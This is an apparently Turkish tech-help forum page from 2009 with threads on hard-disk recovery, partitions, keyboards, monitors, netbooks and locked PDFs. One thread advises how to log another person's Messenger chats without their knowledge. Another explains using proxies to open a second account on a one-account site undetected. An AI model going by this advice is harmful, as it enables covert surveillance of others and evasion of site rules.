sanal uyku
(20.08.09)
sandisk'in 4 gb lısı sony'nin 2gb lısıyla aynı para. vay kazıkçı sony vay.
ikinize de teşekkürler.
0
🌸indeed
(20.08.09)
dostum en güzeli paraya kıyıp 70 liraya sundisk 8 gb alman. ayrıca bu aldığınız arkadaşın psp'si varsa bu kartları orada da kullanabiliyor:)
sdlerin 4 gbsi 30 lira, o da çok ucuz kalmıyor aslında 8 gb memo pro duo yanında.
0
outlawrider
(20.08.09)
(1)

kişi üzerine kayıtlı alan adları

vejeteryan vampir
bir isim yazdığımızda, ücretsiz olarak o ismin üstüne kayıtlı (hani registrar aracılığıyla kaydedilmiş olursa olsun) tüm alan adlarını listeleyen bir site mevcut mudur? http://www.domaintools.com/ var benim bildiğim ama o da ücretli üyelik istiyor.
bir isim yazdığımızda, ücretsiz olarak o ismin üstüne kayıtlı (hani registrar aracılığıyla kaydedilmiş olursa olsun) tüm alan adlarını listeleyen bir site mevcut mudur?
www.domaintools.com var benim bildiğim ama o da ücretli üyelik istiyor.
0
vejeteryan vampir
(20.08.09)
Belki bu işinize yarayabilir

www.bildirgec.org
0
burka
(20.08.09)
(3)

harddisk problemi

akustik cinayet
bilgisayarımın harddiski hasarlı olduğu için değiştiriliyor. teknik servisten eski harddiskimi aldım. içindeki verileri kurtaramamışlar. sorularıma geçelim 1- elimdeki bilgisayarıma ait harddiski harici disk olarak usb girişinden bilgisayara bağlayabilir miyim? eğer bağlayabilirsem bunu nasıl yaparı
bilgisayarımın harddiski hasarlı olduğu için değiştiriliyor. teknik servisten eski harddiskimi aldım. içindeki verileri kurtaramamışlar. sorularıma geçelim

1- elimdeki bilgisayarıma ait harddiski harici disk olarak usb girişinden bilgisayara bağlayabilir miyim? eğer bağlayabilirsem bunu nasıl yaparım.

2- bağladığımı farz ederek içindeki verileri kurtarma şansım nedir.

3- veri kurtarma şirketleri varmış minumum 100 amerikanya doları istiyorlarmış. daha önce bunlarla çalışmış olanlar veya konuya hakim arkadaşlar hasarlı harddiskten veri kurtarıldığında ne kadar ücret talep ettiklerini söyleyebilirlerse sevinirim. zira 100 amerikanya doları ise vereceğim internette 1300 dolar gibi rakamlar telaffuz etmişler.

saygılar.
0
akustik cinayet
(20.08.09)
şimdi şöyle diyeyim hdd iki ana parçadan oluşur; diskler (datanın yazılı olduğu) ve diğerleri yani okuyucu/yazıcı başlık, devreler, controller'lar vs vs.

eğer hdd'nizin devreleri yazıcısı vs sağlamsa ancak disklerde bad sector varsa siz bile oldukça zahmetsiz biçimde bunları kurtarabilirsiniz.

1- ben hiç denemedim bu konuda daha deneyimli kişiler yardımcı olursa iyi olur
2- verilerinizi kurtarmak için hdd regenerator isimli güzel programı kullanabilirsiniz, ancak şunu unutmayın, bunu yapabilmeniz için hdd'nin devre vs kısımları sağlam olmalı, yani kısaca boot aşamasında bios tarafından düzgünce algılanmalıdır. bios'da görünmeyen disk'i siz (veya ben, kısaca bir amatör) kurtaramaz.
3- son dönemlerde işim düşmese de benden zamanında mbyte başına para almışlardı, tam miktarı hatırlamıyorum ancak fiyat sabit değildi.
0
raj
(20.08.09)
1- harddisklerin monte edilebildiği kutular var. hdd'yi ona monte edip usb çıkışı alabiliyorsunuz.
2- kişinin bilgisine göre değişir. board'unu parçalamış olduğum hdd'nin boardunu değiştirip verilerimi kurtarmışlığım vardır yani.
3- evet veri kurtarma işlemleri pahalıya patlıyor. tanıdığınız bilgisayarcı yoksa size çok güzel üflerler.

edit: 1 için: hdd'nin elektrik kablosunu bilgisayarınızın anakartına bağlayıp, diğer veri kablosunu ise bir konvertör yardımıyla usbye çevirip de kullanabilirsiniz. yukarda bahsettiğim kutunun da mantığı buna dayanıyor aslında.
0
suursuz deve
(20.08.09)
bende acer laptopumu harddisk arızası şüphesi ile servise götürdüm. anakartı bozuk dediler. o sıra tez yazıyordum bilgiler önemli ve acele lazımdı. onlar istanbula filan göndermekten bahsediyolardı. bari dedim werileri kurtarın. pc garantideydi ama veri kurtarmayı servis ücreti karşılığında yaparız dediler. mecbur kabul ettim. 35 gb lık bişi idi 40 lira vermştim servis ücreti olarak. o zamanlar koyduydu tabi ama 100$ filan da değildir heralde. servis daha uygun bi ücrete yapabilirdi sanırım ama siz söylemişsiniz zaten kurtaramadıklarını. o da ayrı bi ilginçlik zaten. nası bi teknik servisse :S

tanıdık işi bilen bi bilgisayarcı lazım şuurrsuz devenin de dediği gibi.

hatta yeri gelmişken bende sorayım. philips marka harici harddiskim bozuldu benimde tüm dökünmanlarım resimmlerim ..vs varmıdır işin erbabı bi tanıdığınız? istanbul, bursa olabilir mekan.
0
kojiro
(20.08.09)
(3)

IMac Bolunmus Hard Disk'in Windows Tarafinin Kullanilamamasi

Zanu
Herkese selamlar,Imac kullanicisiyim. Hard Disk hem Windows hem OS X calistirabilmem icin ikiye ayrilmis durumda (partize mi deniliyordu?) . Windows'u artik hic kullamiyorum ( tavsiye ederim herkese) fakat OS X kismina ayrilmis hard diskim dolmak uzere. Windows kismina ayrilan 132 GB'lik alana veri
Herkese selamlar,

Imac kullanicisiyim. Hard Disk hem Windows hem OS X calistirabilmem icin ikiye ayrilmis durumda (partize mi deniliyordu?) . Windows'u artik hic kullamiyorum ( tavsiye ederim herkese) fakat OS X kismina ayrilmis hard diskim dolmak uzere.

Windows kismina ayrilan 132 GB'lik alana veri yazamiyorum. Oyle bos bos duruyor. Biliyorum formatlari farkli fakat;

Var midir bunun bir yolu soyle iki tusa basip windows kismina ayrilan 132 GB'lik alani OS X tarafina kaydirmak?

Simdiden tesekkur ederim
0
Zanu
(20.08.09)
size tavsiyem disk partitioning ile ilgili bir şeyler okumanız, yanlış bir şey yapmayın diye. eskiden (gençken) anlamazdım bu işlerden çok data kaybettim.

windows kısmına ayrılan 132Gbyte'ı os x'e uygun biçimde formatlarsanız oraya da os x ile veri yazabilirsiniz ancak sadece formatlamak bu iki farklı partition'un birleştirmez, sadece 2. partition'a da os x'in yazabilmesini sağlarsınız.
eğer isterseniz parted gibi bir yazılımla o 132Gbyte'ı os x partition'una ekleyebilirsiniz, ancak programı kullanırkan dikkat etmezseniz os x'in kullandığı partition'u tekrar formatlamanız ve oradaki data'yı kaybetmeniz olası. bu yüzden lütfen patitioning yaparken biraz teknik forumları okuyun, yanlış yapmayın.
0
raj
(20.08.09)
windowsu hic kullanmiyorsaniz, direkt o partitioni silip mac icin bicimleyin. Disk Utility'de boyle bi secenek vardi galiba.
0
nawres
(20.08.09)
ntfs kısmına yazabilmek icin un oficial yazılımlar vardı. bızıklamak gerek biraz.
0
pandoraninkutusu
(20.08.09)
(5)

imdat bağlantı sorunu yaşıyorum

hkazma2
firefox veya explorer'dan internete giremiyorum. messenger düzgün çalışıyor. beni ikisi de http://212.156.225.20:9988/r/forward....?UN=kullanıcıadım@ttnet&EC=4 adresine yönlendiriyor. virüs müdür? ultra surf 9,5 programıyla birlikte explorer'ı çalıştırıp girebiliyorum sayfalara. ama o da acaip kasıy
firefox veya explorer'dan internete giremiyorum. messenger düzgün çalışıyor. beni ikisi de 212.156.225.20 adresine yönlendiriyor. virüs müdür? ultra surf 9,5 programıyla birlikte explorer'ı çalıştırıp girebiliyorum sayfalara. ama o da acaip kasıyo ferrari gibi pc yi ltfn cevap allah rızası için
0
hkazma2
(20.08.09)
combofix kur çalıştır , hallolur büyük ihtimal..
0
cagkan
(20.08.09)
yonlendirdigi adres burada kisaltilmis gozuktugu icin tam anlayamadim ama modemin login sorunlari yasamakta sanki.

adsl kullanicisi isen, modemini dugmesinden kapat (veya fisten cek), 1 dakika bekle sonra ac. duzelmesi lazim.

duzelmezse modemin ayarlarina girip adsl kullanici adi vs ayarlarini kontrol et.
0
wpi
(20.08.09)
messenger düzgün çalışıyorsa, internet bağlantın vardır, yani modemin düzgün biçimde net'e bağlanıyordur.

sen virüs ya da spyware kurbanı olmuşsun. modemin sağlam gibi.
0
raj
(20.08.09)
arkadaşlar format attım modemi resetledim hala düzelmedi şu an ultrasurf le bağlanabiliyom. başka tavsiyesi olan
0
🌸hkazma2
(20.08.09)
ben cevabı buldum ama malesef özel ebeplerden dolayı paylaşamıyom. ama illede öğrenmek isterseniz hkazma2 hotmail adresime bi mail atarak sorununuzu yanıtlayabilirim. gerçekten inanamayacaksınız.
0
🌸hkazma2
(21.08.09)
(2)

flash oyun

murphy
ya bir tane flash oyun vardı..odaya giren patronu kah kafasını duvara vurarak, kah dolap kapağıyla öldürüyorduk. 11 farklı cinayet şeklini bulduktan sonra oyun bitiyordu. Oyunun adını hatırlayan var mı?ismini yazarsanız ya da link verirseniz mutluluktan öleceğim...
ya bir tane flash oyun vardı..
odaya giren patronu kah kafasını duvara vurarak, kah dolap kapağıyla öldürüyorduk. 11 farklı cinayet şeklini bulduktan sonra oyun bitiyordu. Oyunun adını hatırlayan var mı?
ismini yazarsanız ya da link verirseniz mutluluktan öleceğim...
0
murphy
(20.08.09)
Oyunu bilmiyorum ama burada olmalı

www.kongregate.com
0
burka
(20.08.09)
whack your boss
0
sharpenter
(20.08.09)
(5)

klavye sorunu

keah
masaüstü bilgisayarın klavyesi sapıttı.klavye q klavye en alt satır olan z satırında herhangi bir sorun yok fakat q ve a olan satırlardaki harflere basınca birkac harf cıkıyor.örneğin q ya basınca qa, w ya basınca wvs, e ye basınca ed cıkıyor.e ye sürekli basınca ddddd diye yazıyor.backspace, virgü
masaüstü bilgisayarın klavyesi sapıttı.klavye q klavye en alt satır olan z satırında herhangi bir sorun yok fakat q ve a olan satırlardaki harflere basınca birkac harf cıkıyor.örneğin q ya basınca qa, w ya basınca wvs, e ye basınca ed cıkıyor.e ye sürekli basınca ddddd diye yazıyor.backspace, virgül gibi tuslarda da sorun var.
kafayı yedi anlayacağınız bu nasıl düzelir?
0
keah
(20.08.09)
restart atın bilgisayara.

klavyeye bir şey dökülmüş olabilir mi?
0
pragmatist kedi
(20.08.09)
bilgisayarı actım, kapadım önceden ama düzelme yok.birşey dökülmedi.ters cevirip epey bir silkeledim yine sonuc yok
0
🌸keah
(20.08.09)
o klavye gitmiş boşuna uğraşma, düzelmez aynı sebepten 3 klavye değiştirdim. ve 3ünde de üstüne çay,su vb. şeyler dökülmüştü. onun üstüne kesin birşey döküldü. istediğin kadar kurula düzelmez.
0
evandro roncatto
(20.08.09)
hocam tez elden bir saatçi tornavidası ile klavyenin arkasındaki vidaları açınız. sonrasında içerideki vakumları temizleyiniz ve ayrıca içerdeki diğer şeffaf devreyi - ki klavyenin töz'ü olur kendileri- kaydıysa yerine oturtunuz. klavyenin tuşlarını tornavida yardımıyla kıskaçlarından kurtararak klavyenin su geçirmez kesimini tertemiz eyleyiniz. ayrıca klavyeden tuşları çıkartmadan evvel bir foto çekiniz, kroki çiziniz ki unutmayasınız. tuşları da bir tas vasıtasıyla bir bir yıkadıktan sonra arkalarına üfleyerek ya da saç kurutma makinası vasıtasıyla kurutarak yerine takınız.
yeni klavyeniz hayırlı olsun.
peşin edit; 1- saatçi tornavidası yoksa ince bir yıldız tornavida da iş görebilir.
2- zor gibi görünse de çok basit ve zevkli bir iştir, 1 saate en geç klavyeniz kullanıma hazır olur!
0
outlawrider
(20.08.09)
İştee öyle bir şeeey

www.eksiduyuru.com
0
Karluk
(20.08.09)
(2)

Windows Live Messenger - Sohbet Günlük Dosyalarım

rurouni
Benim bilgisayarımdan biri oturum açtıgında onun konuşmaları kaydedilsin istiyorum ona sormadan. Normal de soruyor ya kaydedeyim mi diye sormasın direk kaydetsin. var mı öyle bir ayar ve güvenli bir program falan. keylogger la ugrasmak istemiyorm şimdi.
Benim bilgisayarımdan biri oturum açtıgında onun konuşmaları kaydedilsin istiyorum ona sormadan. Normal de soruyor ya kaydedeyim mi diye sormasın direk kaydetsin. var mı öyle bir ayar ve güvenli bir program falan. keylogger la ugrasmak istemiyorm şimdi.
0
rurouni
(20.08.09)
valla messenger plusu tavsiye ederim. eğer oturum açan pek yazı okumayı sevmiyorsa next> next der, sonra da yazılar kayıt olur. aynı sebepten kurdum, ben bile kendi tuzağıma düştüm. kız arkadaşım her yerimden kan getirdi:)
0
outlawrider
(20.08.09)
araçlar - seçenekler - iletiler sekmesinde alt tarafda iletiler kaydedilsin gibi bi secenek var. orda ayarlayabilirsin.
0
pragmatist kedi
(20.08.09)
(7)

Lcd monitor tavsiye.

inugard
Şimdi, araştırdım ettim http://www.hepsiburada.com/inca-il-820a-dvi-20.1-2ms-multimedya-wide-screen-lcd-monitor-sifir-olu-piksel-garantili/productDetails.aspx?categoryid=986&productid=bd52471ile http://www.hepsiburada.com/jetview-dmt22w-1ds4-22-5ms-analogdvi-multimedya-wide-screen-lcd-monitor/produc
Şimdi, araştırdım ettim

www.hepsiburada.com
ile
www.hepsiburada.com
arasında kaldım.

İkisinde de ölü piksel garantisi var, ikisi de 19"den büyük falan. Jetview neyin nesidir diye araştırdım, vestelin yan sanayisi diyenler var ama kesin değil. Kullananlar memnun ama yine de güvenemedim.

İnca'nın tepkime süresi iyi ama aynı paraya daha iyi performanslı dvi kullanan başka monitor varmıdır?
0
inugard
(19.08.09)
(git: www.hepsiburada.com

acer var 22" ..
0
that was just a dream
(19.08.09)
Teknolojinin öncüsü samsung diyorum, hatta yetinmiyorum benzer fiyat aralığında bir de şuna bakın diyorum:
www.hepsiburada.com

www.hepsiburada.com

yok illa benim seçenkelerimin ikisi arasında diyorsanız inca dan elektrik aldım biraz sanki
0
Kazmapolitan
(19.08.09)
viewsonic bakın derim ben...
0
uyuzcan
(20.08.09)
bu sorunun yanıtı benq t2200hda dır.
1920x1080x60hz çözünürlük ve 21.5 inç boyut ile rakiplerini ezip geçiyor.
0
alfred hickorkmaz
(20.08.09)
@alfred benq iyi güzel de analog var onda be abi. analoglar gidici olduğundan hiç bakmıyorum onlara...
0
🌸inugard
(20.08.09)
hepsiburada'dan inca 20.1" almıştım 6-7 ay önce. Bir ölü piksel çıktı o kadar. zaten ölü piksel garantili almazsan bile 3 ölü pikselden sonra garantiye verebiliyorsun. En azından kutusunda öyle yazıyor. Tavsiye ederim.
0
foma
(20.08.09)
hepsini geçip www.hepsiburada.com aldım. oh mis...
0
🌸inugard
(20.08.09)
(7)

atom işlemcili notebook

ceyrekakıl
başlıktaki bilgisayarı almaya niyetliyim. fiyat performans açısından önerilerinize ihtiyaç duymaktayım. sevgilerimle...
başlıktaki bilgisayarı almaya niyetliyim. fiyat performans açısından önerilerinize ihtiyaç duymaktayım. sevgilerimle...
0
ceyrekakıl
(19.08.09)
başlıktaki bilgisayar? o kadar çok modelde atom işlemcisi var ki. sanırım hepsi de netbook, notebook değil. marka ve model verirseniz ona göre bir yorum yaparız.
0
cro magnon
(19.08.09)
netbook ya da notebook olması önemli değil aslında. atom işlemciler daha çok sanırım netbook olarak geçiyor. marka önemi yok. sadece fiyat performans soruyorum.
0
🌸ceyrekakıl
(20.08.09)
atom işlemciyle(hem de ilk çıkanlardan) blue-ray rip izleyebiliyorum. burdan çıkarın siz.

edit: ekran kartı onboard bir de. öyle de bi alet.
0
cro magnon
(20.08.09)
samsung'un nc10 modeline bakin derim. piyasadaki en iyi fiyat/performans onda. arkasindan asus 1000h gelmekte halen! o da fiyati sayesinde. yoksa seashell modellerini cikartti asus onlar daha iyi ama fiyatlari yuksek.
0
entrapmen
(20.08.09)
eeepc 1000h var, süper bi cihaz
şimdi bir de windows 7 tiny edition tarzı bişey var onu kurdum
harika bişey oldu..
kız arkadaşıma da nc10 aldık, o benimkinden de iyi... hem görünüş hem de pil ömrü açısından.. performans olaraksa, pek fark yok gibi
0
de jure
(20.08.09)
samsung nc10 kullanıyoruz memnunuz.
0
blackdog
(20.08.09)
lenovo ideapad s10
lenovo ideapad s9

süper cihazlardır.
0
kemal sunal
(20.08.09)
(1)

Ingilizce Konusulan Yerlerde Finans Kaliplari

zeykur valekov
eheh, basligi görünce insan altindan cilgin bir soru cikacak filan zannediyor da kisaca sunu sormak istiyorum; mesela bizde "türk lirasi bugün dolar karsisinda deger kaybetti" diye bir klise var ya finans programlarinda.abd'de var mi mesela böyle bir sey? onlar, finans programlarinda paralarini euro
eheh, basligi görünce insan altindan cilgin bir soru cikacak filan zannediyor da kisaca sunu sormak istiyorum; mesela bizde "türk lirasi bugün dolar karsisinda deger kaybetti" diye bir klise var ya finans programlarinda.
abd'de var mi mesela böyle bir sey? onlar, finans programlarinda paralarini euro ile kiyasliyor mu mesela, kiyasliyorlarsa bu dedigim cümlenin aynen onlarda kullanilan versiyonu var mi?

not; hicbir alakam ve ilgim yoktur iktisat, isletme, bankacilik, finans gibi alanlarla. sadece otururken bir anda aklima geldi :)
0
zeykur valekov
(19.08.09)
evet butun para birimlerinde var, olaya da devaluasyon deniyor.

"karsisinda deger kaybetmek" kalibi, ingilizce de "devalue against" ya da "decrease in value against" oluyor.

ornek:
Dollar is devalued against euro.
Dollar has decreased in value against euro.
0
ermanen
(19.08.09)
(2)

Boş domain'i değerlendirme?

within temptation
elimde 1 adet domain var.süresinin dolmasına 6 ay gibi bir zaman kaldı.eskiden kişisel blog'um olarak kullanıyordum.şu an boş.acaba nasıl değerlendirebilirim.para fln edermi.pr si en son 2 idi.
elimde 1 adet domain var.süresinin dolmasına 6 ay gibi bir zaman kaldı.eskiden kişisel blog'um olarak kullanıyordum.şu an boş.acaba nasıl değerlendirebilirim.para fln edermi.pr si en son 2 idi.
0
within temptation
(19.08.09)
eger cok ozel ve herkesin istedigi bir ismi yoksa bir ise yaramaz.
0
kurukafa
(19.08.09)
etmez muhtemelen.
0
cnonefb
(19.08.09)
(3)

Proxy sunucularla ilgili iki adet çaylak sorusu

ya ben lan neyse
1. proxy sunucu vasıtasıyla popmundo gibi sadece bir üyeliğe izin veren sitelere girip ikinci bir üyelik açmam bu siteler tarafından farkedilebilir mi?2. internet sunucumuz mahkum olduğumuz ttnet proxy sunucular vasıtasıyla gidiğimiz sitelerden haberdar olabiliyor mu?
1. proxy sunucu vasıtasıyla popmundo gibi sadece bir üyeliğe izin veren sitelere girip ikinci bir üyelik açmam bu siteler tarafından farkedilebilir mi?

2. internet sunucumuz mahkum olduğumuz ttnet proxy sunucular vasıtasıyla gidiğimiz sitelerden haberdar olabiliyor mu?
0
ya ben lan neyse
(19.08.09)
simdi bircok proxy cesidi var, public (80,8080,3128) , private (public port harici), transparent (ip niz gorunuyor), socks4 & 5, burada private proxy ve socks kullanarak ki bunlarinda https destekli olmasi gerekiyor, calismasi durumunda sizi farketme ihtimalleri %1 bile degildir.

2 sorunuzun cevabi da, tt haberdar olur, ama soyle haberdar olur sadece nete baglanirken aldigin ip bunun uzerinden cikislari kayit eder. proxy cikislari yurtdisi cikislar oldugu icin, proxy'e giden ip sadece proxy server uzerinde kayit edilir. ttnet'in cok onemli - aman aman - devlet meselesi seklinde olay olmasi halinde, kayitlar incelenir.

rahat olun burasi turkiye. [:
0
that was just a dream
(19.08.09)
ikincisoruyu net bir şekilde anladım da 1. soruda takıldım. şimd samair.ru dan prox seçerken transparent codeen vs. yazıyor hakkaten. bunların hangileri beni gizler, hangileri gizlemez onları tam anlamadım. transparent gizlemiyor anladığım kadarıyla?
0
🌸ya ben lan neyse
(19.08.09)
hemen cevaplayim sorunu,

seni gizleyecek olanlar, https destekli olan proxyler. bunlarin arasinda 80 8080 portlu olanlarda mevcut. ama comcast'in ozel portlu 65344 gibi proxylerinin cogu senin ip'ni gizler. socks'larda basarilidir bu konuda. http proxylerden daha hizlidirlar. https proxy & socks 4 socks 5 olarak aratirsan bir cok dokuman & proxy bulabilirsin.

forumlarda paylasilan proxyler daha saglamdir, bahsettigin sayfadaki proxylerin cogu calismaz. proxy checker ile kontrol edip kullanabilirsin. ayni paragraftada baslangic satirinda bahsettigim gibi forumlari gezin genelde ordakilar saglam ve uzun omurlu olurlar.
0
that was just a dream
(19.08.09)
(3)

fizy ye şarkı yükleniyor mu?

uykusuz
diyelim benım pc de bazı şarkılar var ve ben onları fizy ye kazandırmak istiyorum çünkü orda yok..yapılabilir bişey mi? üye oldum inceledim ettim ama..ya da başka bir site var mı öle? rapid linki yapmak değil amacım, baya tıklanınca calsın istiyorum.bi el verelim :)
diyelim benım pc de bazı şarkılar var ve ben onları fizy ye kazandırmak istiyorum çünkü orda yok..

yapılabilir bişey mi? üye oldum inceledim ettim ama..

ya da başka bir site var mı öle? rapid linki yapmak değil amacım, baya tıklanınca calsın istiyorum.

bi el verelim :)
0
uykusuz
(19.08.09)
fizy'nin bünyesinde herhangi bir müzik veya video bulunmaz. yaptığı şey video ve müzik sitelerindeki müzik veya videolar arasından arama yapmaya imkan tanıması. bir tür arama motoru denilebilir
0
clones
(19.08.09)
youtube'a yükle etiketlerle aratınca fizy bulur.
0
cro magnon
(19.08.09)
youtube'dan falan ariyor fizy de.
0
osuruklu
(19.08.09)
(4)

pdf'i print edemiyorum

gymbo
Baslik cok ingilizce turkce karisimi oldu ama sorunum su ki elimde 100 sayfalik bir pdf dokumanim var ve bunu yazdirmak istedigim zaman dosya menusunun altindaki yazdir tusu kapali(silik gri renkte). PDF dosyalar boyle yazdirmaya karsi kilitli olabiliyorlar mi? Ve daha da onemlisi ben bu sorunumu na
Baslik cok ingilizce turkce karisimi oldu ama sorunum su ki elimde 100 sayfalik bir pdf dokumanim var ve bunu yazdirmak istedigim zaman dosya menusunun altindaki yazdir tusu kapali(silik gri renkte). PDF dosyalar boyle yazdirmaya karsi kilitli olabiliyorlar mi? Ve daha da onemlisi ben bu sorunumu nasil cozecegim?
0
gymbo
(19.08.09)
yep olabiliyorlar. şurada ingilizce olarak 3-5 çözüm sunmuşlar. bakınca halledersiniz bence, feedback verin ama işlemleri yaptıktan sonra..

web.freepint.com
0
dambil
(19.08.09)
bircok sebebi olabilir bu sorunun ben de siklikla karsilasiyorum. en kolay cozumu yazdirma ekraninda (ctrl+p ye bastiktan sonra gelen ekran) "advanced" butonuna tiklayip "print as image" secenegini secmektir. eger bu ise yaramazsa adobe nin kendi sayfasindaki cozumleri deneyin. ekstra bir program yuklemenize gerek yok.

kb2.adobe.com
0
alan shearer
(19.08.09)
@dambil- tesekkurler site icin, yalniz benim elimdeki dokumanda ordaki hizli tavsiyelerin bir faydasi olmadi. Hatta cok guzel pdf'i "Save As" ile farkli kaydedin diye bir tavsiye de vardi ama muhtemelen yazar onu da kapatmis :-S

simdi rapidshare deki programi kurup onunla deniyecegim.
0
🌸gymbo
(19.08.09)
@ alan shearer-> benim dokumanimdaki print ile ilgili butun butonlar kapatilmis durumda. Bundan dolayi ctrl+p yaptigimdada ekrana hicbirsey gelmiyor. Adobe un sitesine bakacagim simdi. Tesekkurler yardimin icin.
0
🌸gymbo
(19.08.09)
Download on the App Store Get it on Google Play
buraya yazılanların hakları Sir Anthony Hopkins'e aittir.
yazan eden compumaster, ilgilenen eden fader
modere edenler basond, compumaster, fraise, kibritsuyu, rakicandir
bu sitede yazılanların hiçbiri doğru değildir. site içeriği küçükler için sakıncalı olabilir. yazılardan yazarları sorumludur. kaynak göstermeden alıntılanamaz. devlet tarafından atanmış bir kurumun internet üzerinde kimin hangi bilgiye ulaşıp ulaşamayacağına karar vermesi insan haklarına aykırıdır. web siteleri kullanıcıların istekleri doğrultusunda bağlandıkları yerlerdir. kullanıcılar isterlerse bir web sitesine bağlanmayabilirler. bu güçleri ve imkanları mevcuttur. bir kullanıcı bir siteye bağlanmak istiyorsa bu onun tercihi ve hakkıdır. bağlanmak istemiyorsa bu yine onun tercihi ve hakkıdır. halkın kendisine hizmet etmesi için görevlendirdiği kurumlar hadlerini aşıp halka neye ulaşıp ulaşmayacağını bilmeyen cahil cühela muamelesi edemezler. ebeveynlerin çocuklarını sakıncalı içeriklerden koruması için çok sayıda bedava ve ücretli yazılım mevcuttur. bu yazılımlar bir web tarayıcısını kullanmaktan daha karmaşık teknik bilgi gerektirmemektedir. devletin milletini küçük düşürmesi ve ebleh yerine koyması yasaktır.